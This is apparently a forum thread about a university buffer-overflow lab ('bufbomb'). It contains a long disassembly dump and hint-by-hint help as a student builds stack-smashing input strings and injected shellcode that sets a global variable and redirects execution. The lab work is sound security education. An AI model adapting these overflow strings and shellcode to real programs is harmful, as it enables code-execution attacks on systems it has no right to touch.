8049006: c7 04 24 c4 97 04 08 movl $0x80497c4,(%esp)
804900d: e8 82 f7 ff ff call 8048794 <puts@plt>
8049012: c7 05 bc a1 04 08 00 movl $0x0,0x804a1bc
8049019: 00 00 00
804901c: 8b 5d fc mov 0xfffffffc(%ebp),%ebx
804901f: c9 leave
8049020: c3 ret
8049021: e8 0a ff ff ff call 8048f30 <test>
8049026: eb d5 jmp 8048ffd <launch+0x5d>
8049028: c7 04 24 42 99 04 08 movl $0x8049942,(%esp)
804902f: e8 f0 f6 ff ff call 8048724 <printf@plt>
8049034: eb be jmp 8048ff4 <launch+0x54>
8049036: 8d 76 00 lea 0x0(%esi),%esi
8049039: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049040 <main>:
8049040: 8d 4c 24 04 lea 0x4(%esp),%ecx
8049044: 83 e4 f0 and $0xfffffff0,%esp
8049047: ff 71 fc pushl 0xfffffffc(%ecx)
804904a: 55 push %ebp
804904b: 89 e5 mov %esp,%ebp
804904d: 57 push %edi
804904e: 56 push %esi
804904f: 53 push %ebx
8049050: 51 push %ecx
8049051: 83 ec 18 sub $0x18,%esp
8049054: 8b 31 mov (%ecx),%esi
8049056: 8b 59 04 mov 0x4(%ecx),%ebx
8049059: c7 44 24 04 70 89 04 movl $0x8048970,0x4(%esp)
8049060: 08
8049061: c7 04 24 0b 00 00 00 movl $0xb,(%esp)
8049068: e8 e7 f5 ff ff call 8048654 <signal@plt>
804906d: c7 44 24 04 a0 89 04 movl $0x80489a0,0x4(%esp)
8049074: 08
8049075: c7 04 24 07 00 00 00 movl $0x7,(%esp)
804907c: e8 d3 f5 ff ff call 8048654 <signal@plt>
8049081: c7 44 24 04 30 89 04 movl $0x8048930,0x4(%esp)
8049088: 08
8049089: c7 04 24 0e 00 00 00 movl $0xe,(%esp)
8049090: e8 bf f5 ff ff call 8048654 <signal@plt>
8049095: c7 44 24 04 00 89 04 movl $0x8048900,0x4(%esp)
804909c: 08
804909d: c7 04 24 04 00 00 00 movl $0x4,(%esp)
80490a4: e8 ab f5 ff ff call 8048654 <signal@plt>
80490a9: a1 80 a1 04 08 mov 0x804a180,%eax
80490ae: c7 45 e8 00 00 00 00 movl $0x0,0xffffffe8(%ebp)
80490b5: c7 45 ec 01 00 00 00 movl $0x1,0xffffffec(%ebp)
80490bc: a3 a0 a1 04 08 mov %eax,0x804a1a0
80490c1: c7 44 24 08 8f 99 04 movl $0x804998f,0x8(%esp)
80490c8: 08
80490c9: 89 5c 24 04 mov %ebx,0x4(%esp)
80490cd: 89 34 24 mov %esi,(%esp)
80490d0: e8 0f f6 ff ff call 80486e4 <getopt@plt>
80490d5: 3c ff cmp $0xff,%al
80490d7: 0f 84 04 01 00 00 je 80491e1 <main+0x1a1>
80490dd: 83 e8 66 sub $0x66,%eax
80490e0: 3c 12 cmp $0x12,%al
80490e2: 77 0c ja 80490f0 <main+0xb0>
80490e4: 0f b6 c0 movzbl %al,%eax
80490e7: ff 24 85 98 99 04 08 jmp *0x8049998(,%eax,4)
80490ee: 66 90 xchg %ax,%ax
80490f0: 8b 03 mov (%ebx),%eax
80490f2: e8 d9 f8 ff ff call 80489d0 <usage>
80490f7: eb c8 jmp 80490c1 <main+0x81>
80490f9: c7 05 b8 a1 04 08 01 movl $0x1,0x804a1b8
8049100: 00 00 00
8049103: c7 05 a8 a1 04 08 01 movl $0x1,0x804a1a8
804910a: 00 00 00
804910d: c7 05 68 a1 04 08 01 movl $0x1,0x804a168
8049114: 00 00 00
8049117: eb a8 jmp 80490c1 <main+0x81>
8049119: c7 44 24 04 78 99 04 movl $0x8049978,0x4(%esp)
8049120: 08
8049121: a1 84 a1 04 08 mov 0x804a184,%eax
8049126: 89 04 24 mov %eax,(%esp)
8049129: e8 c6 f5 ff ff call 80486f4 <fopen@plt>
804912e: 85 c0 test %eax,%eax
8049130: a3 a0 a1 04 08 mov %eax,0x804a1a0
8049135: 75 8a jne 80490c1 <main+0x81>
8049137: a1 84 a1 04 08 mov 0x804a184,%eax
804913c: c7 04 24 7a 99 04 08 movl $0x804997a,(%esp)
8049143: 89 44 24 04 mov %eax,0x4(%esp)
8049147: e8 d8 f5 ff ff call 8048724 <printf@plt>
804914c: 8b 03 mov (%ebx),%eax
804914e: e8 7d f8 ff ff call 80489d0 <usage>
8049153: e9 69 ff ff ff jmp 80490c1 <main+0x81>
8049158: c7 45 e8 01 00 00 00 movl $0x1,0xffffffe8(%ebp)
804915f: c7 45 ec 05 00 00 00 movl $0x5,0xffffffec(%ebp)
8049166: e9 56 ff ff ff jmp 80490c1 <main+0x81>
804916b: c7 05 a8 a1 04 08 01 movl $0x1,0x804a1a8
8049172: 00 00 00
8049175: e9 47 ff ff ff jmp 80490c1 <main+0x81>
804917a: c7 05 a4 a1 04 08 01 movl $0x1,0x804a1a4
8049181: 00 00 00
8049184: e9 38 ff ff ff jmp 80490c1 <main+0x81>
8049189: a1 84 a1 04 08 mov 0x804a184,%eax
804918e: 89 04 24 mov %eax,(%esp)
8049191: e8 2e f6 ff ff call 80487c4 <__strdup@plt>
8049196: a3 b4 a1 04 08 mov %eax,0x804a1b4
804919b: 89 44 24 04 mov %eax,0x4(%esp)
804919f: c7 04 24 60 99 04 08 movl $0x8049960,(%esp)
80491a6: e8 79 f5 ff ff call 8048724 <printf@plt>
80491ab: a1 b4 a1 04 08 mov 0x804a1b4,%eax
80491b0: 89 04 24 mov %eax,(%esp)
80491b3: e8 88 01 00 00 call 8049340 <gencookie>
80491b8: a3 b0 a1 04 08 mov %eax,0x804a1b0
80491bd: 89 44 24 04 mov %eax,0x4(%esp)
80491c1: c7 04 24 6a 99 04 08 movl $0x804996a,(%esp)
80491c8: e8 57 f5 ff ff call 8048724 <printf@plt>
80491cd: e9 ef fe ff ff jmp 80490c1 <main+0x81>
80491d2: c7 05 ac a1 04 08 01 movl $0x1,0x804a1ac
80491d9: 00 00 00
80491dc: e9 e0 fe ff ff jmp 80490c1 <main+0x81>
80491e1: a1 b4 a1 04 08 mov 0x804a1b4,%eax
80491e6: 85 c0 test %eax,%eax
80491e8: 0f 84 d2 00 00 00 je 80492c0 <main+0x280>
80491ee: a1 b0 a1 04 08 mov 0x804a1b0,%eax
80491f3: 89 04 24 mov %eax,(%esp)
80491f6: e8 39 f5 ff ff call 8048734 <srandom@plt>
80491fb: e8 44 f4 ff ff call 8048644 <random@plt>
8049200: 25 f8 0f 00 00 and $0xff8,%eax
8049205: 89 45 e4 mov %eax,0xffffffe4(%ebp)
8049208: c7 44 24 04 04 00 00 movl $0x4,0x4(%esp)
804920f: 00
8049210: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049213: 89 04 24 mov %eax,(%esp)
8049216: e8 59 f4 ff ff call 8048674 <calloc@plt>
804921b: 89 c7 mov %eax,%edi
804921d: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049220: 83 e8 02 sub $0x2,%eax
8049223: 85 c0 test %eax,%eax
8049225: 7e 1e jle 8049245 <main+0x205>
8049227: 8b 55 ec mov 0xffffffec(%ebp),%edx
804922a: bb 01 00 00 00 mov $0x1,%ebx
804922f: 8d 72 ff lea 0xffffffff(%edx),%esi
8049232: e8 0d f4 ff ff call 8048644 <random@plt>
8049237: 83 e0 38 and $0x38,%eax
804923a: 89 44 9f fc mov %eax,0xfffffffc(%edi,%ebx,
804923e: 83 c3 01 add $0x1,%ebx
8049241: 39 f3 cmp %esi,%ebx
8049243: 75 ed jne 8049232 <main+0x1f2>
8049245: 83 7d ec 01 cmpl $0x1,0xffffffec(%ebp)
8049249: 7e 49 jle 8049294 <main+0x254>
804924b: 8b 55 ec mov 0xffffffec(%ebp),%edx
804924e: 8d 04 97 lea (%edi,%edx,4),%eax
8049251: c7 40 f8 38 00 00 00 movl $0x38,0xfffffff8(%eax)
8049258: c7 40 fc 00 00 00 00 movl $0x0,0xfffffffc(%eax)
804925f: a1 68 a1 04 08 mov 0x804a168,%eax
8049264: 89 04 24 mov %eax,(%esp)
8049267: e8 98 f4 ff ff call 8048704 <alarm@plt>
804926c: 31 db xor %ebx,%ebx
804926e: 66 90 xchg %ax,%ax
8049270: 8b 55 e4 mov 0xffffffe4(%ebp),%edx
8049273: 8b 45 e8 mov 0xffffffe8(%ebp),%eax
8049276: 03 14 9f add (%edi,%ebx,4),%edx
8049279: 83 c3 01 add $0x1,%ebx
804927c: e8 1f fd ff ff call 8048fa0 <launch>
8049281: 3b 5d ec cmp 0xffffffec(%ebp),%ebx
8049284: 7c ea jl 8049270 <main+0x230>
8049286: 83 c4 18 add $0x18,%esp
8049289: 31 c0 xor %eax,%eax
804928b: 59 pop %ecx
804928c: 5b pop %ebx
804928d: 5e pop %esi
804928e: 5f pop %edi
804928f: 5d pop %ebp
8049290: 8d 61 fc lea 0xfffffffc(%ecx),%esp
8049293: c3 ret
8049294: 8b 45 ec mov 0xffffffec(%ebp),%eax
8049297: c7 44 87 fc 00 00 00 movl $0x0,0xfffffffc(%edi,%eax,
804929e: 00
804929f: a1 68 a1 04 08 mov 0x804a168,%eax
80492a4: 89 04 24 mov %eax,(%esp)
80492a7: e8 58 f4 ff ff call 8048704 <alarm@plt>
80492ac: 83 7d ec 01 cmpl $0x1,0xffffffec(%ebp)
80492b0: 74 ba je 804926c <main+0x22c>
80492b2: 83 c4 18 add $0x18,%esp
80492b5: 31 c0 xor %eax,%eax
80492b7: 59 pop %ecx
80492b8: 5b pop %ebx
80492b9: 5e pop %esi
80492ba: 5f pop %edi
80492bb: 5d pop %ebp
80492bc: 8d 61 fc lea 0xfffffffc(%ecx),%esp
80492bf: c3 ret
80492c0: c7 04 24 9c 97 04 08 movl $0x804979c,(%esp)
80492c7: e8 c8 f4 ff ff call 8048794 <puts@plt>
80492cc: 8b 03 mov (%ebx),%eax
80492ce: e8 fd f6 ff ff call 80489d0 <usage>
80492d3: e9 16 ff ff ff jmp 80491ee <main+0x1ae>
80492d8: 90 nop
80492d9: 90 nop
80492da: 90 nop
80492db: 90 nop
80492dc: 90 nop
80492dd: 90 nop
80492de: 90 nop
80492df: 90 nop
080492e0 <hash>:
80492e0: 55 push %ebp
80492e1: 31 c0 xor %eax,%eax
80492e3: 89 e5 mov %esp,%ebp
80492e5: 8b 4d 08 mov 0x8(%ebp),%ecx
80492e8: 0f b6 11 movzbl (%ecx),%edx
80492eb: 84 d2 test %dl,%dl
80492ed: 74 15 je 8049304 <hash+0x24>
80492ef: 90 nop
80492f0: 6b c0 67 imul $0x67,%eax,%eax
80492f3: 0f be d2 movsbl %dl,%edx
80492f6: 8d 04 02 lea (%edx,%eax,1),%eax
80492f9: 0f b6 51 01 movzbl 0x1(%ecx),%edx
80492fd: 83 c1 01 add $0x1,%ecx
8049300: 84 d2 test %dl,%dl
8049302: 75 ec jne 80492f0 <hash+0x10>
8049304: 5d pop %ebp
8049305: c3 ret
8049306: 8d 76 00 lea 0x0(%esi),%esi
8049309: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049310 <check>:
8049310: 55 push %ebp
8049311: 89 e5 mov %esp,%ebp
8049313: 8b 55 08 mov 0x8(%ebp),%edx
8049316: 89 d0 mov %edx,%eax
8049318: c1 e8 1c shr $0x1c,%eax
804931b: 85 c0 test %eax,%eax
804931d: 74 19 je 8049338 <check+0x28>
804931f: 31 c9 xor %ecx,%ecx
8049321: 89 d0 mov %edx,%eax
8049323: d3 e8 shr %cl,%eax
8049325: 3c 0a cmp $0xa,%al
8049327: 74 0f je 8049338 <check+0x28>
8049329: 83 c1 08 add $0x8,%ecx
804932c: 83 f9 20 cmp $0x20,%ecx
804932f: 75 f0 jne 8049321 <check+0x11>
8049331: 5d pop %ebp
8049332: b8 01 00 00 00 mov $0x1,%eax
8049337: c3 ret
8049338: 5d pop %ebp
8049339: 31 c0 xor %eax,%eax
804933b: c3 ret
804933c: 8d 74 26 00 lea 0x0(%esi),%esi
08049340 <gencookie>:
8049340: 55 push %ebp
8049341: 89 e5 mov %esp,%ebp
8049343: 53 push %ebx
8049344: 83 ec 04 sub $0x4,%esp
8049347: 8b 45 08 mov 0x8(%ebp),%eax
804934a: 89 04 24 mov %eax,(%esp)
804934d: e8 8e ff ff ff call 80492e0 <hash>
8049352: 89 04 24 mov %eax,(%esp)
8049355: e8 da f2 ff ff call 8048634 <srand@plt>
804935a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
8049360: e8 3f f4 ff ff call 80487a4 <rand@plt>
8049365: 89 c3 mov %eax,%ebx
8049367: 89 04 24 mov %eax,(%esp)
804936a: e8 a1 ff ff ff call 8049310 <check>
804936f: 85 c0 test %eax,%eax
8049371: 74 ed je 8049360 <gencookie+0x20>
8049373: 89 d8 mov %ebx,%eax
8049375: 83 c4 04 add $0x4,%esp
8049378: 5b pop %ebx
8049379: 5d pop %ebp
804937a: c3 ret
804937b: 90 nop
804937c: 90 nop
804937d: 90 nop
804937e: 90 nop
804937f: 90 nop
08049380 <__libc_csu_fini>:
8049380: 55 push %ebp
8049381: 89 e5 mov %esp,%ebp
8049383: 5d pop %ebp
8049384: c3 ret
8049385: 8d 74 26 00 lea 0x0(%esi),%esi
8049389: 8d bc 27 00 00 00 00 lea 0x0(%edi),%edi
08049390 <__libc_csu_init>:
8049390: 55 push %ebp
8049391: 89 e5 mov %esp,%ebp
8049393: 57 push %edi
8049394: 56 push %esi
8049395: 53 push %ebx
8049396: e8 5e 00 00 00 call 80493f9 <__i686.get_pc_thunk.bx>
804939b: 81 c3 45 0d 00 00 add $0xd45,%ebx
80493a1: 83 ec 1c sub $0x1c,%esp
80493a4: e8 53 f2 ff ff call 80485fc <_init>
80493a9: 8d 83 20 ff ff ff lea 0xffffff20(%ebx),%eax
80493af: 89 45 f0 mov %eax,0xfffffff0(%ebp)
80493b2: 8d 83 20 ff ff ff lea 0xffffff20(%ebx),%eax
80493b8: 29 45 f0 sub %eax,0xfffffff0(%ebp)
80493bb: c1 7d f0 02 sarl $0x2,0xfffffff0(%ebp)
80493bf: 8b 55 f0 mov 0xfffffff0(%ebp),%edx
80493c2: 85 d2 test %edx,%edx
80493c4: 74 2b je 80493f1 <__libc_csu_init+0x61>
80493c6: 31 ff xor %edi,%edi
80493c8: 89 c6 mov %eax,%esi
80493ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi
80493d0: 8b 45 10 mov 0x10(%ebp),%eax
80493d3: 83 c7 01 add $0x1,%edi
80493d6: 89 44 24 08 mov %eax,0x8(%esp)
80493da: 8b 45 0c mov 0xc(%ebp),%eax
80493dd: 89 44 24 04 mov %eax,0x4(%esp)
80493e1: 8b 45 08 mov 0x8(%ebp),%eax
80493e4: 89 04 24 mov %eax,(%esp)
80493e7: ff 16 call *(%esi)
80493e9: 83 c6 04 add $0x4,%esi
80493ec: 39 7d f0 cmp %edi,0xfffffff0(%ebp)
80493ef: 75 df jne 80493d0 <__libc_csu_init+0x40>
80493f1: 83 c4 1c add $0x1c,%esp
80493f4: 5b pop %ebx
80493f5: 5e pop %esi
80493f6: 5f pop %edi
80493f7: 5d pop %ebp
80493f8: c3 ret
080493f9 <__i686.get_pc_thunk.bx>:
80493f9: 8b 1c 24 mov (%esp),%ebx
80493fc: c3 ret
80493fd: 90 nop
80493fe: 90 nop
80493ff: 90 nop
08049400 <__do_global_ctors_aux>:
8049400: 55 push %ebp
8049401: 89 e5 mov %esp,%ebp
8049403: 53 push %ebx
8049404: bb 00 a0 04 08 mov $0x804a000,%ebx
8049409: 83 ec 04 sub $0x4,%esp
804940c: a1 00 a0 04 08 mov 0x804a000,%eax
8049411: 83 f8 ff cmp $0xffffffff,%eax
8049414: 74 0c je 8049422 <__do_global_ctors_aux+0x2
8049416: 83 eb 04 sub $0x4,%ebx
8049419: ff d0 call *%eax
804941b: 8b 03 mov (%ebx),%eax
804941d: 83 f8 ff cmp $0xffffffff,%eax
8049420: 75 f4 jne 8049416 <__do_global_ctors_aux+0x1
8049422: 83 c4 04 add $0x4,%esp
8049425: 5b pop %ebx
8049426: 5d pop %ebp
8049427: c3 ret
Disassembly of section .fini:
08049428 <_fini>:
8049428: 55 push %ebp
8049429: 89 e5 mov %esp,%ebp
804942b: 53 push %ebx
804942c: 83 ec 04 sub $0x4,%esp
804942f: e8 00 00 00 00 call 8049434 <_fini+0xc>
8049434: 5b pop %ebx
8049435: 81 c3 ac 0c 00 00 add $0xcac,%ebx
804943b: e8 00 f4 ff ff call 8048840 <__do_global_dtors_aux>
8049440: 59 pop %ecx
8049441: 5b pop %ebx
8049442: c9 leave
8049443: c3 ret
-bash-3.1$
The first level is to get bufbomb to execute the code for smoke when getbuf executes its return statement rather than returning to test by providing a string to overwrite the buffer. I am not very sure what that means and how to do this level. I think by knowing how to do this level I will be able to do other level
Thanks and please help
infinity08?? Where are you
ASKER
can you please go a bit further. I could not figured anything out yet
thanks
thanks
Look into the function that reads the string (Gets). Combine that with the hint from the title : "buffer overflow".
You'll probably find that that function only expects a string of a certain size. If you enter a string that is longer, you'll overwrite the memory after the buffer (called a buffer overflow).
Now, what you have to do is look at the stack layout ... follow exactly what happens with the stack during the execution of the test and Gets functions, and you'll find your answer.
This should be a VERY good hint. Take a look at it.
You'll probably find that that function only expects a string of a certain size. If you enter a string that is longer, you'll overwrite the memory after the buffer (called a buffer overflow).
Now, what you have to do is look at the stack layout ... follow exactly what happens with the stack during the execution of the test and Gets functions, and you'll find your answer.
This should be a VERY good hint. Take a look at it.
ASKER
really I am very confuse in this program. It is not like the program that I did previous with you. Whenever I try to see what in deadbeef with x and p command it give null or value cannot convert to integer. Please help with this phase so I know the idea behind it? I know that I cannot type more than 16 character and need to find the string to overwrite the buffer but dont really know how to do that
>> It is not like the program that I did previous with you.
No it's not ... it involves "cheating" ... ie. doing something that the program doesn't expect. Look up buffer overflows, and se what they do, and how they can be exploited.
If you are interested, this is THE reference articel on stack buffer overflows :
http://insecure.org/stf/smashstack.html
It's a bit advanced maybe, but very interesting.
If you're looking for a simpler introduction to buffer overflows, then check here :
http://en.wikipedia.org/wiki/Buffer_overflow
>> Whenever I try to see what in deadbeef with x and p command it give null or value cannot convert to integer.
Of course - it's an invalid address ... there's nothing at that address ... and neither should there be something. You have to do something else with that value ;)
>> I know that I cannot type more than 16 character and need to find the string to overwrite the buffer but dont really know how to do that
If 16 is the limit, then what would happen if you enter more than 16 characters ? Think about that ... Big hint again ... ;)
No it's not ... it involves "cheating" ... ie. doing something that the program doesn't expect. Look up buffer overflows, and se what they do, and how they can be exploited.
If you are interested, this is THE reference articel on stack buffer overflows :
http://insecure.org/stf/smashstack.html
It's a bit advanced maybe, but very interesting.
If you're looking for a simpler introduction to buffer overflows, then check here :
http://en.wikipedia.org/wiki/Buffer_overflow
>> Whenever I try to see what in deadbeef with x and p command it give null or value cannot convert to integer.
Of course - it's an invalid address ... there's nothing at that address ... and neither should there be something. You have to do something else with that value ;)
>> I know that I cannot type more than 16 character and need to find the string to overwrite the buffer but dont really know how to do that
If 16 is the limit, then what would happen if you enter more than 16 characters ? Think about that ... Big hint again ... ;)
ASKER
oh my god, i just did phase 0, now to phase 1
ASKER
just write 17 character+ the address of smoke()
ASKER
20+address sorry
ASKER
in level 1 when you look at fizz at mov 0x8(%ebp), %ebx i dont know why ebx changes my ebp which is my input. how can i make ebx equal to my ebp?
thanks
thanks
>> oh my god, i just did phase 0, now to phase 1
Nice eh ;) Isn't this a fun way to trick a program into doing what you want ? :)
>> in level 1 when you look at fizz at mov 0x8(%ebp), %ebx i dont know why ebx changes my ebp which is my input. how can i make ebx equal to my ebp?
I'm not sure I understand what you mean. This instruction :
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
will add 8 to the current value of ebp (at that moment it contains esp, the stack pointer), and store the resulting value in ebx :
ebx = ebp + 8
or in other words, ebx will point to the position 8 bytes under the top of the stack.
Nice eh ;) Isn't this a fun way to trick a program into doing what you want ? :)
>> in level 1 when you look at fizz at mov 0x8(%ebp), %ebx i dont know why ebx changes my ebp which is my input. how can i make ebx equal to my ebp?
I'm not sure I understand what you mean. This instruction :
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
will add 8 to the current value of ebp (at that moment it contains esp, the stack pointer), and store the resulting value in ebx :
ebx = ebp + 8
or in other words, ebx will point to the position 8 bytes under the top of the stack.
ASKER
Here forexample
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 60 8d 04 08
ebp is 20191817 but then where will ebx point to
Thanks
01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 60 8d 04 08
ebp is 20191817 but then where will ebx point to
Thanks
ASKER
the level 1 is the same as level 0 but you return fizz instead of smoke and since fizz has a parameter value it must match that value to a cookie which is a regular address. That is what I am trying to put in or looking for the cookie place but everytime ebx is offset of 8 bytes so my cookie is pointing somewhere else
>> ebp is 20191817 but then where will ebx point to
Sorry - correction of earlier - it was a mov, not a lea :
ebx = *(ebp + 8)
Anyway, if ebp has the value 0x20191817, then after this instruction :
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
ebx will contain the value at address 0x2019181F (0x20191817 + 0x00000008). Notice the "value at" part, so ebx will not contain the address 0x2019181F (like I said earlier), but the value at that address.
Sorry - correction of earlier - it was a mov, not a lea :
ebx = *(ebp + 8)
Anyway, if ebp has the value 0x20191817, then after this instruction :
8048d07: 8b 5d 08 mov 0x8(%ebp),%ebx
ebx will contain the value at address 0x2019181F (0x20191817 + 0x00000008). Notice the "value at" part, so ebx will not contain the address 0x2019181F (like I said earlier), but the value at that address.
ASKER
so how do we know what value 0x2019181F is. when i run under GDB, i see that address but when print that address out it said it cannot convert that address
Thanks
Thanks
>> but everytime ebx is offset of 8 bytes so my cookie is pointing somewhere else
Then you have to make sure to place your value at that 8 bytes offset ...
Then you have to make sure to place your value at that 8 bytes offset ...
>> so how do we know what value 0x2019181F is.
Well, since your 0x20191817 was probably only an example, you can choose the address yourself. Make sure that it points somewhere where you were able to put the value you need (taking into account the 8 bytes offset).
Well, since your 0x20191817 was probably only an example, you can choose the address yourself. Make sure that it points somewhere where you were able to put the value you need (taking into account the 8 bytes offset).
ASKER
can you please more clarify i think i still dont quite understand this offset means. if it is 8 byte offset to 17 18 19 20 for example in the string i provided above which means 4 character offset then it must be either 13 14 15 16 or after the return value but when I put both of them it still does not show the result
by the chance do you know how to increase the point of this question becuase it happens to be multiple question and i wanted to increase the point for you
thanks
by the chance do you know how to increase the point of this question becuase it happens to be multiple question and i wanted to increase the point for you
thanks
>> can you please more clarify i think i still dont quite understand this offset means. if it is 8 byte offset to 17 18 19 20
The 4 bytes 17 18 19 20 are interpreted as an address 0x20191817. Then an offset of 8 is added to that address, so 0x20191817 + 0x00000008 = 0x2019181F. Then the code looks at that address, and stores the value found there in ebx.
Now, you want a certain value in ebx, so you store that value at a known memory location (suppose it is address 0x0A0A0A0A). Then you add a negative offset of 8 to get address 0x0A0A0A02. That's the value you need to put on the stack by overflowing the string buffer.
The 4 bytes 17 18 19 20 are interpreted as an address 0x20191817. Then an offset of 8 is added to that address, so 0x20191817 + 0x00000008 = 0x2019181F. Then the code looks at that address, and stores the value found there in ebx.
Now, you want a certain value in ebx, so you store that value at a known memory location (suppose it is address 0x0A0A0A0A). Then you add a negative offset of 8 to get address 0x0A0A0A02. That's the value you need to put on the stack by overflowing the string buffer.
>> by the chance do you know how to increase the point of this question becuase it happens to be multiple question and i wanted to increase the point for you
If you want to do that, you can post a 0-point question in Community support to ask do that for you. You don't need to though ... I'm happy to help you either way ;)
If you want to do that, you can post a 0-point question in Community support to ask do that for you. You don't need to though ... I'm happy to help you either way ;)
ASKER
looking at the fizz function which is
Dump of assembler code for function fizz:
0x08048d00 <fizz+0>: push %ebp
0x08048d01 <fizz+1>: mov %esp,%ebp
0x08048d03 <fizz+3>: push %ebx
0x08048d04 <fizz+4>: sub $0x14,%esp
0x08048d07 <fizz+7>: mov 0x8(%ebp),%ebx
0x08048d0a <fizz+10>: movl $0x1,(%esp)
0x08048d11 <fizz+17>: call 0x80488f0 <entry_check>
0x08048d16 <fizz+22>: cmp 0x804a1b0,%ebx
0x08048d1c <fizz+28>: je 0x8048d40 <fizz+64>
0x08048d1e <fizz+30>: mov %ebx,0x4(%esp)
0x08048d22 <fizz+34>: movl $0x8049730,(%esp)
0x08048d29 <fizz+41>: call 0x8048724 <printf@plt>
0x08048d2e <fizz+46>: movl $0x0,(%esp)
0x08048d35 <fizz+53>: call 0x80487d4 <exit@plt>
0x08048d3a <fizz+58>: lea 0x0(%esi),%esi
0x08048d40 <fizz+64>: mov %ebx,0x4(%esp)
0x08048d44 <fizz+68>: movl $0x80498b5,(%esp)
0x08048d4b <fizz+75>: call 0x8048724 <printf@plt>
0x08048d50 <fizz+80>: movl $0x1,(%esp)
0x08048d57 <fizz+87>: call 0x8048a30 <validate>
0x08048d5c <fizz+92>: jmp 0x8048d2e <fizz+46>
0x08048d5e <fizz+94>: data16
0x08048d5f <fizz+95>: nop
the cookie which I need to send as parameter is stored at 0x804a1b0. So according to your recommend I think I will minus 8 that address which give me 0x804a1a8 and then my solution text is 01 02 .. 16 a8 a1 04 08 00 d8 04 08 but the ebx is still set to 0xfbad2a84
Dump of assembler code for function fizz:
0x08048d00 <fizz+0>: push %ebp
0x08048d01 <fizz+1>: mov %esp,%ebp
0x08048d03 <fizz+3>: push %ebx
0x08048d04 <fizz+4>: sub $0x14,%esp
0x08048d07 <fizz+7>: mov 0x8(%ebp),%ebx
0x08048d0a <fizz+10>: movl $0x1,(%esp)
0x08048d11 <fizz+17>: call 0x80488f0 <entry_check>
0x08048d16 <fizz+22>: cmp 0x804a1b0,%ebx
0x08048d1c <fizz+28>: je 0x8048d40 <fizz+64>
0x08048d1e <fizz+30>: mov %ebx,0x4(%esp)
0x08048d22 <fizz+34>: movl $0x8049730,(%esp)
0x08048d29 <fizz+41>: call 0x8048724 <printf@plt>
0x08048d2e <fizz+46>: movl $0x0,(%esp)
0x08048d35 <fizz+53>: call 0x80487d4 <exit@plt>
0x08048d3a <fizz+58>: lea 0x0(%esi),%esi
0x08048d40 <fizz+64>: mov %ebx,0x4(%esp)
0x08048d44 <fizz+68>: movl $0x80498b5,(%esp)
0x08048d4b <fizz+75>: call 0x8048724 <printf@plt>
0x08048d50 <fizz+80>: movl $0x1,(%esp)
0x08048d57 <fizz+87>: call 0x8048a30 <validate>
0x08048d5c <fizz+92>: jmp 0x8048d2e <fizz+46>
0x08048d5e <fizz+94>: data16
0x08048d5f <fizz+95>: nop
the cookie which I need to send as parameter is stored at 0x804a1b0. So according to your recommend I think I will minus 8 that address which give me 0x804a1a8 and then my solution text is 01 02 .. 16 a8 a1 04 08 00 d8 04 08 but the ebx is still set to 0xfbad2a84
Which value is stored at 0x804a1b0 ?
And are you sure that you put the a8 a1 04 08 at the correct location in the string ? (check the value with your debugger).
And are you sure that you put the a8 a1 04 08 at the correct location in the string ? (check the value with your debugger).
ASKER
ok finally i get it. i am moving to the next level
>> i am moving to the next level
Going good ;)
Going good ;)
ASKER
on this level i need to set the global variable of band() to my cookie then like the 2 previous level i need to return to bang. can you give some advice
ASKER
is this the assembly code to overwrite global variable (0x0804a1c0) with my cookie (0x0804a1b0):
movl %eax,0x62f898e1
movl 0x0804a1c0,%eax
ret
thanks
i am thinking of putting this byte code the buffer then continue return the value of the bang address
what you think
movl %eax,0x62f898e1
movl 0x0804a1c0,%eax
ret
thanks
i am thinking of putting this byte code the buffer then continue return the value of the bang address
what you think
ASKER
please help I need to turn this in in 2 hours
Sorry for the delay, but I was out and then sleeping ;)
>> movl %eax,0x62f898e1
>> movl 0x0804a1c0,%eax
movl copies the left argument to the right, not the other way around ...
>> ret
will pop the instruction pointer from the stack, and go to it. So, you'll need to put the return instruction on the stack.
>> i am thinking of putting this byte code the buffer then continue return the value of the bang address
If you found a way to call that bytecode, then that's a way to change it yes. However, if you can execute bytecode, you can do a lot more than just that ;)
As I said before, I haven't had the time recently to really dive into this, so I might not have been a lot of help.
A quick look says that you need to indeed somehow set 0x804a1c0 to the cookie. What are you allowed to do ? Can you manipulate the binary ? Or just the runtime ?
>> movl %eax,0x62f898e1
>> movl 0x0804a1c0,%eax
movl copies the left argument to the right, not the other way around ...
>> ret
will pop the instruction pointer from the stack, and go to it. So, you'll need to put the return instruction on the stack.
>> i am thinking of putting this byte code the buffer then continue return the value of the bang address
If you found a way to call that bytecode, then that's a way to change it yes. However, if you can execute bytecode, you can do a lot more than just that ;)
As I said before, I haven't had the time recently to really dive into this, so I might not have been a lot of help.
A quick look says that you need to indeed somehow set 0x804a1c0 to the cookie. What are you allowed to do ? Can you manipulate the binary ? Or just the runtime ?
ASKER
It is over due time now but I wanted to know this level, it tooks me so much time to do this
Within the ï¬le bufbomb there is a function bang having the following C code:
int global_value = 0;
void bang(int val)
{
entry_check(2); /* Make sure entered this function properly */
if (global_value == cookie) {
printf("Bang!: You set global_value to 0x%x\n", global_value);
validate(2);
} else
printf("Misfire: global_value = 0x%x\n", global_value);
exit(0);
}
Similar to Levels 0 and 1, your task is to get BUFB OMB to execute the code for bang rather than returning
to test. Before this, however, you must set global variable global_value to your team’s cookie. Your
exploit code should set global_value, push the address of bang on the stack, and then execute a ret
instruction to cause a jump to the code for bang.
my code to manipulate the buffer is
movl 0x62f898e1,%eax
movl %eax,0x0804a1c0
push $0x08048ca0
ret
then it convert to the byte code
00000000 <.text>:
0: a1 e1 98 f8 62 mov 0x62f898e1,%eax
5: a3 c0 a1 04 08 mov %eax,0x804a1c0
a: 68 a0 8c 04 08 push $0x8048ca0
f: c3 ret
-bash-3.1$
then my solution is
b8 e1 98 f8 62 a3 c0 a1 04 08 68 a0 8c 04 08 c3 00 00 00 00 d8 b1 ff bf
which then I convert to ascii
However I keep getting the segmentation fault.
